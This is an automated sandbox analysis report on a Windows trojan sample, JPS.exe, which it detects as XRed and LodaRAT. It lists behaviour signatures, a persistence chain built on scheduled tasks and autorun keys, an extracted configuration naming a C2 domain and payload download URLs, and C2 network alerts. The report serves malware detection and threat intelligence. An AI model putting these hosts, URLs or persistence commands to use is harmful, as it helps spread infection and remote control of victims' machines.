Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
JPS.exe

Overview

General Information

Sample name:JPS.exe
Analysis ID:1582339
MD5:290a46d2614f4ce4f7ad75d2cea2ce23
SHA1:cc9f762b21f649252881087b2ff56e88d4b5a6f1
SHA256:7cbe965fa1278ba09c31e191c19ac1e2b52f940b656273872c805833ae03e276
Tags:exeknkbkk212user-JAMESWT_MHT
Infos:

Detection

LodaRAT, XRed
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LodaRAT
Yara detected XRed
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Document contains an embedded VBA macro with suspicious strings
Document contains an embedded VBA with functions possibly related to ADO stream file operations
Document contains an embedded VBA with functions possibly related to HTTP operations
Document contains an embedded VBA with functions possibly related to WSH operations (process, registry, environment, or keystrokes)
Drops PE files to the document folder of the user
Machine Learning detection for dropped file
Machine Learning detection for sample
Sigma detected: Potentially Suspicious Malware Callback Communication
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: WScript or CScript Dropper
Uses dynamic DNS services
Uses schtasks.exe or at.exe to add and modify task schedules
Windows Scripting host queries suspicious COM object (likely to drop second stage)
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected potential crypto function
Document contains an embedded VBA macro which executes code when the document is opened / closed
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops files with a non-matching file extension (content does not match file extension)
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May infect USB drives
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
OS version to string mapping found (often used in BOTs)
One or more processes crash
PE file contains executable resources (Code or Archives)
Potential key logger detected (key state polling based)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the installation date of Windows
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Schtasks From Env Var Folder
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Sigma detected: Wow6432Node CurrentVersion Autorun Keys Modification
Sleep loop found (likely to delay execution)
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara detected ProcessChecker

Classification

Process Tree

  • System is w10x64
  • JPS.exe (PID: 7448 cmdline: "C:\Users\user\Desktop\JPS.exe" MD5: 290A46D2614F4CE4F7AD75D2CEA2CE23)
    • ._cache_JPS.exe (PID: 7544 cmdline: "C:\Users\user\Desktop\._cache_JPS.exe" MD5: FBE9E7E00A80A2321BADFA4E962FE15E)
      • cmd.exe (PID: 7708 cmdline: C:\Windows\system32\cmd.exe /c schtasks /create /tn BQQQVU.exe /tr C:\Users\user\AppData\Roaming\Windata\XNLAGO.exe /sc minute /mo 1 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 7716 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • schtasks.exe (PID: 7800 cmdline: schtasks /create /tn BQQQVU.exe /tr C:\Users\user\AppData\Roaming\Windata\XNLAGO.exe /sc minute /mo 1 MD5: 48C2FE20575769DE916F48EF0676A965)
      • wscript.exe (PID: 7732 cmdline: WSCript C:\Users\user\AppData\Local\Temp\BQQQVU.vbs MD5: FF00E0480075B095948000BDC66E81F0)
    • Synaptics.exe (PID: 7604 cmdline: "C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate MD5: B50AAC59E97F3D38A19ACB9253FABEBC)
      • WerFault.exe (PID: 8284 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7604 -s 3432 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • EXCEL.EXE (PID: 7648 cmdline: "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding MD5: 4A871771235598812032C822E6F68F19)
  • XNLAGO.exe (PID: 7956 cmdline: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exe MD5: FBE9E7E00A80A2321BADFA4E962FE15E)
  • XNLAGO.exe (PID: 7480 cmdline: "C:\Users\user\AppData\Roaming\Windata\XNLAGO.exe" MD5: FBE9E7E00A80A2321BADFA4E962FE15E)
  • Synaptics.exe (PID: 2888 cmdline: "C:\ProgramData\Synaptics\Synaptics.exe" MD5: B50AAC59E97F3D38A19ACB9253FABEBC)
  • XNLAGO.exe (PID: 7484 cmdline: "C:\Users\user\AppData\Roaming\Windata\XNLAGO.exe" MD5: FBE9E7E00A80A2321BADFA4E962FE15E)
  • XNLAGO.exe (PID: 8292 cmdline: "C:\Users\user\AppData\Roaming\Windata\XNLAGO.exe" MD5: FBE9E7E00A80A2321BADFA4E962FE15E)
  • XNLAGO.exe (PID: 8332 cmdline: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exe MD5: FBE9E7E00A80A2321BADFA4E962FE15E)
  • XNLAGO.exe (PID: 8644 cmdline: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exe MD5: FBE9E7E00A80A2321BADFA4E962FE15E)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Loda, LodaRATLoda is a previously undocumented AutoIT malware with a variety of capabilities for spying on victims. Proofpoint first observed Loda in September of 2016 and it has since grown in popularity. The name Loda is derived from a directory to which the malware author chose to write keylogger logs. It should be noted that some antivirus products currently detect Loda as Trojan.Nymeria, although the connection is not well-documented.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.loda

Malware Configuration

Threatname: XRed

{"C2 url": "xred.mooo.com", "Email": "xredline1@gmail.com", "Payload urls": ["http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978", "https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download", "https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=1", "http://xred.site50.net/syn/SUpdate.ini", "https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=download", "https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1", "http://xred.site50.net/syn/Synaptics.rar", "https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=download", "https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1", "http://xred.site50.net/syn/SSLLibrary.dll"]}

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
JPS.exeJoeSecurity_XRedYara detected XRedJoe Security
    JPS.exeJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security

      Dropped Files

      SourceRuleDescriptionAuthorStrings
      C:\Users\user\AppData\Local\Temp\BQQQVU.vbsJoeSecurity_ProcessCheckerYara detected ProcessCheckerJoe Security
        C:\ProgramData\Synaptics\RCX5246.tmpJoeSecurity_XRedYara detected XRedJoe Security
          C:\ProgramData\Synaptics\RCX5246.tmpJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security
            C:\Users\user\Documents\~$cache1JoeSecurity_XRedYara detected XRedJoe Security
              C:\Users\user\Documents\~$cache1JoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security
                Click to see the 2 entries

                Memory Dumps

                SourceRuleDescriptionAuthorStrings
                00000002.00000002.2564672501.00000000040E6000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_ProcessCheckerYara detected ProcessCheckerJoe Security
                  00000007.00000002.2555561177.0000000000E10000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_ProcessCheckerYara detected ProcessCheckerJoe Security
                    00000007.00000002.2554418377.0000000000BA8000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_ProcessCheckerYara detected ProcessCheckerJoe Security
                      00000000.00000000.1298292720.0000000000401000.00000020.00000001.01000000.00000003.sdmpJoeSecurity_XRedYara detected XRedJoe Security
                        00000000.00000000.1298292720.0000000000401000.00000020.00000001.01000000.00000003.sdmpJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security
                          Click to see the 7 entries

                          Unpacked PEs

                          SourceRuleDescriptionAuthorStrings
                          0.0.JPS.exe.400000.0.unpackJoeSecurity_XRedYara detected XRedJoe Security
                            0.0.JPS.exe.400000.0.unpackJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security

                              Sigma Signatures

                              System Summary

                              barindex
                              Sigma detected: Potentially Suspicious Malware Callback Communication
                              Source: Network ConnectionAuthor: Florian Roth (Nextron Systems): Data: DestinationIp: 172.111.138.100, DestinationIsIpv6: false, DestinationPort: 5552, EventID: 3, Image: C:\Users\user\Desktop\._cache_JPS.exe, Initiated: true, ProcessId: 7544, Protocol: tcp, SourceIp: 192.168.2.11, SourceIsIpv6: false, SourcePort: 49797
                              Sigma detected: Script Interpreter Execution From Suspicious Folder
                              Source: Process startedAuthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: WSCript C:\Users\user\AppData\Local\Temp\BQQQVU.vbs, CommandLine: WSCript C:\Users\user\AppData\Local\Temp\BQQQVU.vbs, CommandLine|base64offset|contains: Y , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\._cache_JPS.exe" , ParentImage: C:\Users\user\Desktop\._cache_JPS.exe, ParentProcessId: 7544, ParentProcessName: ._cache_JPS.exe, ProcessCommandLine: WSCript C:\Users\user\AppData\Local\Temp\BQQQVU.vbs, ProcessId: 7732, ProcessName: wscript.exe
                              Sigma detected: Suspicious Script Execution From Temp Folder
                              Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: WSCript C:\Users\user\AppData\Local\Temp\BQQQVU.vbs, CommandLine: WSCript C:\Users\user\AppData\Local\Temp\BQQQVU.vbs, CommandLine|base64offset|contains: Y , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\._cache_JPS.exe" , ParentImage: C:\Users\user\Desktop\._cache_JPS.exe, ParentProcessId: 7544, ParentProcessName: ._cache_JPS.exe, ProcessCommandLine: WSCript C:\Users\user\AppData\Local\Temp\BQQQVU.vbs, ProcessId: 7732, ProcessName: wscript.exe
                              Sigma detected: WScript or CScript Dropper
                              Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: WSCript C:\Users\user\AppData\Local\Temp\BQQQVU.vbs, CommandLine: WSCript C:\Users\user\AppData\Local\Temp\BQQQVU.vbs, CommandLine|base64offset|contains: Y , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\._cache_JPS.exe" , ParentImage: C:\Users\user\Desktop\._cache_JPS.exe, ParentProcessId: 7544, ParentProcessName: ._cache_JPS.exe, ProcessCommandLine: WSCript C:\Users\user\AppData\Local\Temp\BQQQVU.vbs, ProcessId: 7732, ProcessName: wscript.exe
                              Sigma detected: CurrentVersion Autorun Keys Modification
                              Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: "C:\Users\user\AppData\Roaming\Windata\XNLAGO.exe", EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\._cache_JPS.exe, ProcessId: 7544, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\BQQQVU
                              Sigma detected: Startup Folder File Write
                              Source: File createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Users\user\Desktop\._cache_JPS.exe, ProcessId: 7544, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\BQQQVU.lnk
                              Sigma detected: Suspicious Schtasks From Env Var Folder
                              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: schtasks /create /tn BQQQVU.exe /tr C:\Users\user\AppData\Roaming\Windata\XNLAGO.exe /sc minute /mo 1, CommandLine: schtasks /create /tn BQQQVU.exe /tr C:\Users\user\AppData\Roaming\Windata\XNLAGO.exe /sc minute /mo 1, CommandLine|base64offset|contains: mj,, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c schtasks /create /tn BQQQVU.exe /tr C:\Users\user\AppData\Roaming\Windata\XNLAGO.exe /sc minute /mo 1, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7708, ParentProcessName: cmd.exe, ProcessCommandLine: schtasks /create /tn BQQQVU.exe /tr C:\Users\user\AppData\Roaming\Windata\XNLAGO.exe /sc minute /mo 1, ProcessId: 7800, ProcessName: schtasks.exe
                              Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
                              Source: Process startedAuthor: Michael Haag: Data: Command: WSCript C:\Users\user\AppData\Local\Temp\BQQQVU.vbs, CommandLine: WSCript C:\Users\user\AppData\Local\Temp\BQQQVU.vbs, CommandLine|base64offset|contains: Y , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\._cache_JPS.exe" , ParentImage: C:\Users\user\Desktop\._cache_JPS.exe, ParentProcessId: 7544, ParentProcessName: ._cache_JPS.exe, ProcessCommandLine: WSCript C:\Users\user\AppData\Local\Temp\BQQQVU.vbs, ProcessId: 7732, ProcessName: wscript.exe
                              Sigma detected: Wow6432Node CurrentVersion Autorun Keys Modification
                              Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\ProgramData\Synaptics\Synaptics.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\JPS.exe, ProcessId: 7448, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Synaptics Pointing Device Driver
                              Sigma detected: Office Macro File Creation
                              Source: File createdAuthor: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\ProgramData\Synaptics\Synaptics.exe, ProcessId: 7604, TargetFilename: C:\Users\user\AppData\Local\Temp\J6UTCx7N.xlsm

                              Suricata Signatures

                              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                              2024-12-30T11:25:29.697550+010020448871A Network Trojan was detected192.168.2.1149762172.217.18.110443TCP
                              2024-12-30T11:25:29.711379+010020448871A Network Trojan was detected192.168.2.1149761172.217.18.110443TCP
                              2024-12-30T11:25:30.983358+010020448871A Network Trojan was detected192.168.2.1149775172.217.18.110443TCP
                              2024-12-30T11:25:30.991855+010020448871A Network Trojan was detected192.168.2.1149776172.217.18.110443TCP
                              2024-12-30T11:25:31.958178+010020448871A Network Trojan was detected192.168.2.1149787172.217.18.110443TCP
                              2024-12-30T11:25:32.070859+010020448871A Network Trojan was detected192.168.2.1149788172.217.18.110443TCP
                              2024-12-30T11:25:33.036472+010020448871A Network Trojan was detected192.168.2.1149799172.217.18.110443TCP
                              2024-12-30T11:25:33.052311+010020448871A Network Trojan was detected192.168.2.1149802172.217.18.110443TCP
                              2024-12-30T11:25:34.713134+010020448871A Network Trojan was detected192.168.2.1149825172.217.18.110443TCP
                              2024-12-30T11:25:34.723403+010020448871A Network Trojan was detected192.168.2.1149826172.217.18.110443TCP
                              2024-12-30T11:25:35.715047+010020448871A Network Trojan was detected192.168.2.1149839172.217.18.110443TCP
                              2024-12-30T11:25:35.842350+010020448871A Network Trojan was detected192.168.2.1149837172.217.18.110443TCP
                              2024-12-30T11:25:36.721748+010020448871A Network Trojan was detected192.168.2.1149845172.217.18.110443TCP
                              2024-12-30T11:25:36.816313+010020448871A Network Trojan was detected192.168.2.1149847172.217.18.110443TCP
                              2024-12-30T11:25:37.730917+010020448871A Network Trojan was detected192.168.2.1149857172.217.18.110443TCP
                              2024-12-30T11:25:37.830902+010020448871A Network Trojan was detected192.168.2.1149859172.217.18.110443TCP
                              2024-12-30T11:25:39.324642+010020448871A Network Trojan was detected192.168.2.1149878172.217.18.110443TCP
                              2024-12-30T11:25:39.326532+010020448871A Network Trojan was detected192.168.2.1149879172.217.18.110443TCP
                              2024-12-30T11:25:40.297532+010020448871A Network Trojan was detected192.168.2.1149892172.217.18.110443TCP
                              2024-12-30T11:25:40.309514+010020448871A Network Trojan was detected192.168.2.1149890172.217.18.110443TCP
                              2024-12-30T11:25:41.331630+010020448871A Network Trojan was detected192.168.2.1149900172.217.18.110443TCP
                              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                              2024-12-30T11:25:31.580437+010028221161Malware Command and Control Activity Detected192.168.2.1149797172.111.138.1005552TCP
                              2024-12-30T11:26:07.839451+010028221161Malware Command and Control Activity Detected192.168.2.1150136172.111.138.1005552TCP
                              2024-12-30T11:26:53.026577+010028221161Malware Command and Control Activity Detected192.168.2.1150148172.111.138.1005552TCP
                              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                              2024-12-30T11:25:30.160355+010028326171Malware Command and Control Activity Detected192.168.2.114976969.42.215.25280TCP
                              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                              2024-12-30T11:25:14.879330+010028498851Malware Command and Control Activity Detected192.168.2.1150136172.111.138.1005552TCP
                              2024-12-30T11:25:14.879330+010028498851Malware Command and Control Activity Detected192.168.2.1149797172.111.138.1005552TCP
                              2024-12-30T11:25:14.879330+010028498851Malware Command and Control Activity Detected192.168.2.1150144172.111.138.1005552TCP
                              2024-12-30T11:25:14.879330+010028498851Malware Command and Control Activity Detected192.168.2.1149903172.111.138.1005552TCP
                              2024-12-30T11:25:14.879330+010028498851Malware Command and Control Activity Detected192.168.2.1150009172.111.138.1005552TCP
                              2024-12-30T11:25:14.879330+010028498851Malware Command and Control Activity Detected192.168.2.1150149172.111.138.1005552TCP
                              2024-12-30T11:25:14.879330+010028498851Malware Command and Control Activity Detected192.168.2.1150148172.111.138.1005552TCP
                              2024-12-30T11:25:14.879330+010028498851Malware Command and Control Activity Detected192.168.2.1150141172.111.138.1005552TCP
                              2024-12-30T11:25:14.879330+010028498851Malware Command and Control Activity Detected192.168.2.1150150172.111.138.1005552TCP
                              2024-12-30T11:25:14.879330+010028498851Malware Command and Control Activity Detected192.168.2.1150102172.111.138.1005552TCP
                              2024-12-30T11:25:14.879330+010028498851Malware Command and Control Activity Detected192.168.2.1150151172.111.138.1005552TCP
                              2024-12-30T11:25:14.879330+010028498851Malware Command and Control Activity Detected192.168.2.1150147172.111.138.1005552TCP
                              2024-12-30T11:25:14.879330+010028498851Malware Command and Control Activity Detected192.168.2.1150140172.111.138.1005552TCP
                              2024-12-30T11:25:31.580437+010028498851Malware Command and Control Activity Detected192.168.2.1149797172.111.138.1005552TCP
                              2024-12-30T11:25:40.620474+010028498851Malware Command and Control Activity Detected192.168.2.1149903172.111.138.1005552TCP
                              2024-12-30T11:25:49.754340+010028498851Malware Command and Control Activity Detected192.168.2.1150009172.111.138.1005552TCP
                              2024-12-30T11:25:58.794699+010028498851Malware Command and Control Activity Detected192.168.2.1150102172.111.138.1005552TCP
                              2024-12-30T11:26:07.839451+010028498851Malware Command and Control Activity Detected192.168.2.1150136172.111.138.1005552TCP
                              2024-12-30T11:26:16.936177+010028498851Malware Command and Control Activity Detected192.168.2.1150140172.111.138.1005552TCP
                              2024-12-30T11:26:25.963712+010028498851Malware Command and Control Activity Detected192.168.2.1150141172.111.138.1005552TCP
                              2024-12-30T11:26:34.979812+010028498851Malware Command and Control Activity Detected192.168.2.1150144172.111.138.1005552TCP
                              2024-12-30T11:26:44.005613+010028498851Malware Command and Control Activity Detected192.168.2.1150147172.111.138.1005552TCP
                              2024-12-30T11:26:53.026577+010028498851Malware Command and Control Activity Detected192.168.2.1150148172.111.138.1005552TCP
                              2024-12-30T11:27:02.074137+010028498851Malware Command and Control Activity Detected192.168.2.1150149172.111.138.1005552TCP
                              2024-12-30T11:27:11.135835+010028498851Malware Command and Control Activity Detected192.168.2.1150150172.111.138.1005552TCP
                              2024-12-30T11:27:20.198693+010028498851Malware Command and Control Activity Detected192.168.2.1150151172.111.138.1005552TCP

                              Joe Sandbox Signatures

                              Click to jump to signature section

                              Show All Signature Results

                              AV Detection

                              barindex
                              Antivirus / Scanner detection for submitted sample
                              Source: JPS.exeAvira: detected
                              Source: JPS.exeAvira: detected
                              Antivirus detection for URL or domain
                              Source: http://xred.site50.net/syn/SSLLibrary.dlpAvira URL Cloud: Label: malware
                              Source: http://xred.site50.net/syn/SUpdate.iniH)Avira URL Cloud: Label: malware
                              Antivirus detection for dropped file
                              Source: C:\ProgramData\Synaptics\RCX5246.tmpAvira: detection malicious, Label: TR/Dldr.Agent.SH
                              Source: C:\ProgramData\Synaptics\RCX5246.tmpAvira: detection malicious, Label: W2000M/Dldr.Agent.17651006
                              Source: C:\Users\user\AppData\Local\Temp\BQQQVU.vbsAvira: detection malicious, Label: VBS/Runner.VPJI
                              Source: C:\ProgramData\Synaptics\Synaptics.exeAvira: detection malicious, Label: TR/Dldr.Agent.SH
                              Source: C:\ProgramData\Synaptics\Synaptics.exeAvira: detection malicious, Label: W2000M/Dldr.Agent.17651006
                              Source: C:\Users\user\Documents\~$cache1Avira: detection malicious, Label: TR/Dldr.Agent.SH
                              Source: C:\Users\user\Documents\~$cache1Avira: detection malicious, Label: W2000M/Dldr.Agent.17651006
                              Found malware configuration
                              Source: JPS.exeMalware Configuration Extractor: XRed {"C2 url": "xred.mooo.com", "Email": "xredline1@gmail.com", "Payload urls": ["http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978", "https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download", "https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=1", "http://xred.site50.net/syn/SUpdate.ini", "https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=download", "https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1", "http://xred.site50.net/syn/Synaptics.rar", "https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=download", "https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1", "http://xred.site50.net/syn/SSLLibrary.dll"]}
                              Multi AV Scanner detection for dropped file
                              Source: C:\ProgramData\Synaptics\RCX5246.tmpReversingLabs: Detection: 92%
                              Source: C:\ProgramData\Synaptics\Synaptics.exeReversingLabs: Detection: 92%
                              Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeReversingLabs: Detection: 68%
                              Source: C:\Users\user\Desktop\._cache_JPS.exeReversingLabs: Detection: 68%
                              Source: C:\Users\user\Documents\~$cache1ReversingLabs: Detection: 92%
                              Multi AV Scanner detection for submitted file
                              Source: JPS.exeVirustotal: Detection: 85%Perma Link
                              Source: JPS.exeReversingLabs: Detection: 92%
                              AI detected suspicious sample
                              Source: Submited SampleIntegrated Neural Analysis Model: Matched 98.3% probability
                              Machine Learning detection for dropped file
                              Source: C:\ProgramData\Synaptics\RCX5246.tmpJoe Sandbox ML: detected
                              Source: C:\Users\user\Desktop\._cache_JPS.exeJoe Sandbox ML: detected
                              Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeJoe Sandbox ML: detected
                              Source: C:\ProgramData\Synaptics\Synaptics.exeJoe Sandbox ML: detected
                              Source: C:\Users\user\Documents\~$cache1Joe Sandbox ML: detected
                              Machine Learning detection for sample
                              Source: JPS.exeJoe Sandbox ML: detected
                              Source: JPS.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile opened: C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\MSVCR100.dllJump to behavior
                              Source: unknownHTTPS traffic detected: 172.217.18.110:443 -> 192.168.2.11:49762 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.217.18.110:443 -> 192.168.2.11:49761 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.181.225:443 -> 192.168.2.11:49777 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.181.225:443 -> 192.168.2.11:49778 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.217.18.110:443 -> 192.168.2.11:49787 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.217.18.110:443 -> 192.168.2.11:49788 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.217.18.110:443 -> 192.168.2.11:49826 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.217.18.110:443 -> 192.168.2.11:49825 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.181.225:443 -> 192.168.2.11:49838 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.181.225:443 -> 192.168.2.11:49836 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.217.18.110:443 -> 192.168.2.11:49845 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.217.18.110:443 -> 192.168.2.11:49847 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.217.18.110:443 -> 192.168.2.11:49878 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.217.18.110:443 -> 192.168.2.11:49879 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.217.18.110:443 -> 192.168.2.11:49892 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.181.225:443 -> 192.168.2.11:49893 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.217.18.110:443 -> 192.168.2.11:49890 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.181.225:443 -> 192.168.2.11:49891 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.217.18.110:443 -> 192.168.2.11:49912 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.217.18.110:443 -> 192.168.2.11:49913 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.181.225:443 -> 192.168.2.11:49914 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.181.225:443 -> 192.168.2.11:49920 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.217.18.110:443 -> 192.168.2.11:49948 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.217.18.110:443 -> 192.168.2.11:49950 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.181.225:443 -> 192.168.2.11:49976 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.217.18.110:443 -> 192.168.2.11:49977 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.217.18.110:443 -> 192.168.2.11:49983 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.181.225:443 -> 192.168.2.11:49984 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.217.18.110:443 -> 192.168.2.11:49991 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.217.18.110:443 -> 192.168.2.11:49993 version: TLS 1.2
